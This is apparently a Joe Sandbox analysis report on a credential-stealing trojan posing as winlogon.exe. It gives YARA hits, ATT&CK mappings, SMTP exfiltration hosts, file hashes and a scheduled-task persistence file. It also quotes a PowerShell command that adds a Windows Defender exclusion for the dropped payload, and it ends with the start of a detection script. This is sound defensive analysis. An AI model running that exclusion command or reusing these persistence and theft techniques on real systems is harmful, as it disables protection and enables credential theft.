                      Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.winlogon.exe.3cf9f30.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.winlogon.exe.3cc4110.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.winlogon.exe.3cf9f30.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.winlogon.exe.3cc4110.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000000.672988393.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000000.673339643.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.929157483.00000000029B4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: winlogon.exe PID: 6768, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6284, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 211 | Scheduled Task/Job 1 | Process Injection 112 | Disable or Modify Tools 11 | OS Credential Dumping 2 | Account Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scheduled Task/Job 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Deobfuscate/Decode Files or Information 11 | Credentials in Registry 1 | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 3 | Security Account Manager | System Information Discovery 114 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 13 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Timestomp 1 | LSA Secrets | Security Software Discovery 211 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 131 | DCSync | Virtualization/Sandbox Evasion 131 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 112 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact

                      Behavior Graph

                      Behavior Graph ID: 532921 | Sample: winlogon.exe | Start date: 02/12/2021 | Architecture: WINDOWS | Score: 100
                      Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Multi AV Scanner detection for submitted file; 8 other signatures
                      winlogon.exe (started)
                        Network: 192.168.2.1 (unknown, unknown)
                        Dropped: C:\Users\user\AppData\...\UlhpAjSuVoTa.exe (PE32); C:\Users\user\AppData\Local\...\tmpD7F1.tmp (XML); C:\Users\user\AppData\...\winlogon.exe.log (ASCII)
                        Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
                        RegSvcs.exe (started)
                          Network: smtp.stockmeieir.com; us2.smtp.mailhostbox.com 208.91.199.224, 49843, 587, PUBLIC-DOMAIN-REGISTRYUS, United States
                          Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 3 other signatures
                        powershell.exe (started)
                          conhost.exe (started)
                        schtasks.exe (started)
                          conhost.exe (started)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label | Link
                      winlogon.exe | 24% | Virustotal | | Browse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label | Link | Download
                      6.0.RegSvcs.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                      6.0.RegSvcs.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                      6.0.RegSvcs.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                      6.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                      6.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                      6.0.RegSvcs.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label | Link
                      http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe |
                      http://smtp.stockmeieir.com | 0% | Avira URL Cloud | safe |
                      http://wwHpow.com | 0% | Avira URL Cloud | safe |
                      https://Qr1QL48h5BTOb.com | 0% | Avira URL Cloud | safe |
                      https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe |
                      http://DynDns.comDynDNS | 0% | URL Reputation | safe |
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe |
                      https://api.ipify.org% | 0% | URL Reputation | safe |
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe |

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      us2.smtp.mailhostbox.com | 208.91.199.224 | true | false | | high
                      smtp.stockmeieir.com | unknown | unknown | true | | unknown

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://smtp.stockmeieir.com | RegSvcs.exe, 00000006.00000002.929285525.0000000002A52000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://wwHpow.com | RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://Qr1QL48h5BTOb.com | RegSvcs.exe, 00000006.00000002.929225214.0000000002A03000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000002.929273138.0000000002A4C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org%GETMozilla/5.0 | RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://DynDns.comDynDNS | RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://us2.smtp.mailhostbox.com | RegSvcs.exe, 00000006.00000002.929285525.0000000002A52000.00000004.00000001.sdmp | false | - | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | RegSvcs.exe, 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | winlogon.exe, 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | false | - | high
https://api.ipify.org% | RegSvcs.exe, 00000006.00000002.929145314.00000000029AC000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | winlogon.exe, 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

                              Contacted IPs

                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.91.199.224 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:532921
                              Start date:02.12.2021
                              Start time:20:21:14
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 8m 25s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:winlogon.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:18
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@9/8@2/2
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

Time | Type | Description
20:22:08 | API Interceptor | 1x Sleep call for process: winlogon.exe modified
20:22:12 | API Interceptor | 40x Sleep call for process: powershell.exe modified
20:22:23 | API Interceptor | 826x Sleep call for process: RegSvcs.exe modified

                              Joe Sandbox View / Context

                              IPs

Match: 208.91.199.224
Associated Sample Name / URL | Detection
Dhl Document.exe | malicious
hkpg4iBhY1.exe | malicious
PO_783992883.exe | malicious
Payment copy $95,914.38MT103_0987658999643PDF.exe | malicious
Details To Be Reconfirmed.doc | malicious
03SPwb995m.exe | malicious
PAGO DEL SALDO.doc | malicious
MT_1O1_SWIFt.doc | malicious
Reconfirm The Details.doc | malicious
Document.exe | malicious
MT_101_SWIFT.doc | malicious
ORDER INQUIRY-PVP-SP-2021-58.exe | malicious
DOC221121.exe | malicious
TOP QUOTATION RFQ 2021.exe | malicious
AWB Number 0004318855.DOCX.exe | malicious
Purchase Order.exe | malicious
ORDER INQUIRY-PVP-SP-2021-56.exe | malicious
PRESUPUESTO.xlsx | malicious
vYeUxRnIbLKDudo.exe | malicious
DHL Documentos de envio originales.exe | malicious

                                                                      Domains

Match: us2.smtp.mailhostbox.com
Associated Sample Name / URL | Detection | Context
Dhl Document 7348255141.exe | malicious | 208.91.198.143
Dhl Document.exe | malicious | 208.91.199.224
DHL Waybill receipt.exe | malicious | 208.91.199.223
DHL SHIPMENT NOTIFICATION 284748395PD.exe | malicious | 208.91.199.223
Swift MT103 pdf.exe | malicious | 208.91.199.225
Scan096355.exe | malicious | 208.91.199.225
yYa94CeATF8h2NA.exe | malicious | 208.91.199.223
PG4636 - Confirmed .xls.exe | malicious | 208.91.198.143
PG4636 - Confirmed .xls.exe | malicious | 208.91.199.225
BOQ.exe | malicious | 208.91.199.223
RFQ-Spares and tools.exe | malicious | 208.91.198.143
CARTASCONF.xlsx | malicious | 208.91.199.224
Documento de env.exe | malicious | 208.91.199.223
hkpg4iBhY1.exe | malicious | 208.91.199.224
account details and invoice.exe | malicious | 208.91.198.143
justificantepago_es_180208779493.xlsx | malicious | 208.91.199.224
winlogon.exe | malicious | 208.91.198.143
PO_783992883.exe | malicious | 208.91.199.223
OUTWARD SWIFT-103 MSG Payment Transcript.PDF.exe | malicious | 208.91.199.223
ROfr29tilpUhTHx.exe | malicious | 208.91.199.223

                                                                      ASN

Match: PUBLIC-DOMAIN-REGISTRYUS
Associated Sample Name / URL | Detection | Context
Dhl Document 7348255141.exe | malicious | 208.91.198.143
TNT Documents.exe | malicious | 119.18.54.99
Dhl Document.exe | malicious | 208.91.199.224
DHL Waybill receipt.exe | malicious | 208.91.199.223
Shipping Document BL Copy.exe | malicious | 103.195.185.115
DHL SHIPMENT NOTIFICATION 284748395PD.exe | malicious | 208.91.199.223
SHIPPING DOCUMENT & PL.exe | malicious | 103.195.185.115
Swift MT103 pdf.exe | malicious | 208.91.199.225
Scan096355.exe | malicious | 208.91.199.225
yYa94CeATF8h2NA.exe | malicious | 208.91.199.223
part-1500645108.xlsb | malicious | 103.76.231.42
part-1500645108.xlsb | malicious | 103.76.231.42
item-40567503.xlsb | malicious | 162.215.254.201
item-40567503.xlsb | malicious | 162.215.254.201
PG4636 - Confirmed .xls.exe | malicious | 208.91.198.143
item-107262298.xlsb | malicious | 162.215.254.201
item-107262298.xlsb | malicious | 162.215.254.201
item-1202816963.xlsb | malicious | 162.215.254.201
item-1202816963.xlsb | malicious | 162.215.254.201
DHL Receipt.html | malicious | 199.79.62.126

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe | justificantepago_es_180208779494.xlsx | malicious

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\winlogon.exe.log
                                                                        Process:C:\Users\user\Desktop\winlogon.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):1310
                                                                        Entropy (8bit):5.345651901398759
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                                                                        MD5:D918C6A765EDB90D2A227FE23A3FEC98
                                                                        SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                                                                        SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                                                                        SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                                                                        Malicious:true
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):22320
                                                                        Entropy (8bit):5.602598488027755
                                                                        Encrypted:false
                                                                        SSDEEP:384:StCDm0QsEdEY7SlxRgS0nUjultIi77Y9gFSJ3x6T1MaPZlbAV77FvOZBDI+9zg:l/sTUClt9fFcACOfwPIV4
                                                                        MD5:AA1D3E3546DF44DAE5F48413437EDBE4
                                                                        SHA1:5C5AE47F753AA6EAE575C7C9750D76BAB26EBD5B
                                                                        SHA-256:E0CFFE057ABB82AEE8350F87A2D10B3F4C838767B04847B858D1E7AB25F6B7D3
                                                                        SHA-512:591B822BEA9032C0A33BAE648B34BB993B60D22A49D0A70C01750F21575A1C1842B06A4AF0C1ED52C9112058775AD6C5F602782E7AD96999B6F42C1E851F3E41
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: @...e...................h.p...........M...I..........@..........H...............<@.^.L."My...:U..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gbn1r51.3xf.ps1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brqhmx13.5q1.psm1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                                                                        Process:C:\Users\user\Desktop\winlogon.exe
                                                                        File Type:XML 1.0 document, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1599
                                                                        Entropy (8bit):5.139934532028239
                                                                        Encrypted:false
                                                                        SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaTxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTIv
                                                                        MD5:69054F2C960937C174E7410ABB925255
                                                                        SHA1:ED6E69491A37FFA722743420727CE92B37D7C122
                                                                        SHA-256:F2BACD6A1A1788FF112806BC7D1AEE8A1468C881ED71096151A72FDF38F1D7B2
                                                                        SHA-512:8A96CEDF8600A43B044A76E3164BABD9260D2C0F1CBE4FC9448C945E4FF91143512D7DE3B6A1FC153A99EF5C12AC4981894C01A1F8D5B5AFF5FAE32BAB237C33
                                                                        Malicious:true
                                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                        C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                                                                        Process:C:\Users\user\Desktop\winlogon.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):473600
                                                                        Entropy (8bit):7.814013296316778
                                                                        Encrypted:false
                                                                        SSDEEP:12288:Tu39J++7isfbzaXkpbWiVSDZynHjqRpfJ2Wfi/Srws:TutJ++7lzzkCUZSHjqff9fi6r
                                                                        MD5:629F5BB8B5EE75E90C393AD9D96A1772
                                                                        SHA1:B09925A7163BEF858657A1B39146FE27ABB01F99
                                                                        SHA-256:15637F2D530662C968272C1E6E48CA6A093F0C828EDF0CBB5CD32D9AF03B3FF5
                                                                        SHA-512:3434C0B1F42533C42A4232809A007DDFD340EBC0D500DB436CD038E3D3B4AAF0FD8BCF36E3A1CEE4442C5D894679F5CDC7CEF5A90C04534F937121D6CC9E3857
                                                                        Malicious:true
                                                                        Joe Sandbox View:
• Filename: justificantepago_es_180208779494.xlsx, Detection: malicious
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....hO...............0..0...........N... ...`....@.. ....................................@.................................tN..O....`..............................XN............................................... ............... ..H............text........ ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..B.................N......H.......@E..........X....s..`............................................0...........(.......s....}.....{....r...p.o......{....r...p.o......s2...}.....(....{...........s....o......(....{...........s....o......(....o....&*....0............{.....+..*.0............{.....+..*&...}....*....(....o5...}......(....o3...}.....(.....*...0..Q..........r...pr...p.{.....{....s.....{....s?...(......(....o....&.(....o............-.*....0..e........(........}......{.....{....s....}......++..
                                                                        C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe:Zone.Identifier
                                                                        Process:C:\Users\user\Desktop\winlogon.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:false
                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                        C:\Users\user\Documents\20211202\PowerShell_transcript.506013.Hm7BnSFA.20211202202210.txt
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):5797
                                                                        Entropy (8bit):5.390476094744057
                                                                        Encrypted:false
                                                                        SSDEEP:96:BZ+jbNZqDo1ZuZajbNZqDo1Z25bRjZqjbNZqDo1ZSNohhWjZUa:z
                                                                        MD5:ADA12A7BE4CD5E6A7CD39358076285E4
                                                                        SHA1:A7F4AB45E34FC800EE46D2D44C97E5190ED03D54
                                                                        SHA-256:79BAB3A013939F122B176E38C0B68B121F8B6BA5850818ACCEDE73838B3F6A40
                                                                        SHA-512:993858A2B3F9EF8388D64B745AE3AC46712231D27BCA9D932CB101C1E188FF41CC88BC192D0B4413A496AB7343FC02BFDB8C896D4C0644D90B87D9DC6010ABC2
                                                                        Malicious:false
                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211202202211..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe..Process ID: 6968..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211202202211..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe..**********************..Windows PowerShell transcript start..Start time: 20211202202538..Username: computer\user..RunAs User: computer\
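The transcript above records the sample spawning PowerShell to whitelist its own dropped copy in Windows Defender (Add-MpPreference -ExclusionPath on a file under AppData\Roaming). The following is an added example, not part of the Joe Sandbox report: it pulls the exclusion command and the identity fields out of a transcript of this shape. TRANSCRIPT is the beginning of the dropped PowerShell_transcript file shown above with the report's ".." separators restored as line breaks; the list of user-writable locations, the severity labels and the alert format are this example's own choices.

```python
"""Pull Defender-exclusion commands out of a PowerShell transcript.

Added example, not part of the Joe Sandbox report. TRANSCRIPT is the beginning
of the dropped PowerShell_transcript file shown in the report, with ".."
separators restored as CRLF; the user-writable path list, severities and
alert format are this example's own choices.
"""
import re

TRANSCRIPT = "\r\n".join([
    "**********************",
    "Windows PowerShell transcript start",
    "Start time: 20211202202211",
    "Username: computer\\user",
    "RunAs User: computer\\user",
    "Configuration Name: ",
    "Machine: 506013 (Microsoft Windows NT 10.0.17134.0)",
    "Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\UlhpAjSuVoTa.exe",
    "Process ID: 6968",
    "PSVersion: 5.1.17134.1",
    "**********************",
    "Command start time: 20211202202211",
    "**********************",
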